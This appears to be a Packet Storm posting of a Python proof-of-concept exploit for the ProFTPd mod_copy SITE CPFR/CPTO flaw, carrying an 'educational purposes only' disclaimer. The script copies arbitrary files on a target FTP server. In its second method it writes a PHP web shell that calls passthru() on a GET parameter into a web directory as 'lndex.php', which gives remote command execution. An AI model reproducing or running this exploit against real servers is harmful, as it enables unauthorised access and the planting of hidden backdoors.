ProFTPd CPFR / CPTO proof of concept exploit.
3a2aa92d9c4f7980f410f8313494e891bbb9e807a8b13f39e584580f72f7eef6'''
*** for educational purpouse ONLY! ***
c0ded by daldana. (daniel.aldana.moreno ___at__ gmail.com)
please, first read https://github.com/chcx/cpx_proftpd/
'''
import sys
from ftplib import FTP
def main(argv):
if len(argv) == 4:
ip = argv[1]
src = argv[2]
dst = argv[3]
option = 1
elif len(argv) == 3:
ip = argv[1]
dst = argv[2]
option = 2
else:
print 'please check the readme file.-'
sys.exit(2)
try:
ftp = FTP(ip)
except:
print 'connection refused.-'
sys.exit(2)
if option == 1:
print 'YOU ARE TRYING METHOD ONE:'
cmd1 = 'SITE CPFR ' + src
cmd2 = 'SITE CPTO ' + dst
try:
res1 = ftp.sendcmd(cmd1)
except:
print 'NO SUCH FILE :('
sys.exit(2)
try:
res2 = ftp.sendcmd(cmd2)
print 'NICE! TRY NOW! :)'
except:
print 'YOU DON\'T HAVE PERMISSION :('
sys.exit(2)
if option == 2:
print 'YOU ARE TRYING METHOD TWO:'
cmd1 = 'SITE CPFR /proc/self/cmdline'
cmd2 = 'SITE CPTO /tmp/...<?php passthru($_GET[\'img\']);?>'
cmd3 = 'SITE CPFR /tmp/...<?php passthru($_GET[\'img\']);?>'
cmd4 = 'SITE CPTO ' + dst + '/lndex.php'
print 'UPLOADING in ' + dst + '/lndex.php'
try:
res1 = ftp.sendcmd(cmd1)
except:
print 'NO SUCH FILE OR PERMISSION FOR CMDLINE :('
sys.exit(2)
try:
res2 = ftp.sendcmd(cmd2)
except:
print 'YOU DON\'T HAVE PERMISSION :('
sys.exit(2)
try:
res3 = ftp.sendcmd(cmd3)
res4 = ftp.sendcmd(cmd4)
print 'NICE! TRY NOW! :)'
except:
print 'PROBLEMS ;('
if __name__ == "__main__":
main(sys.argv)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed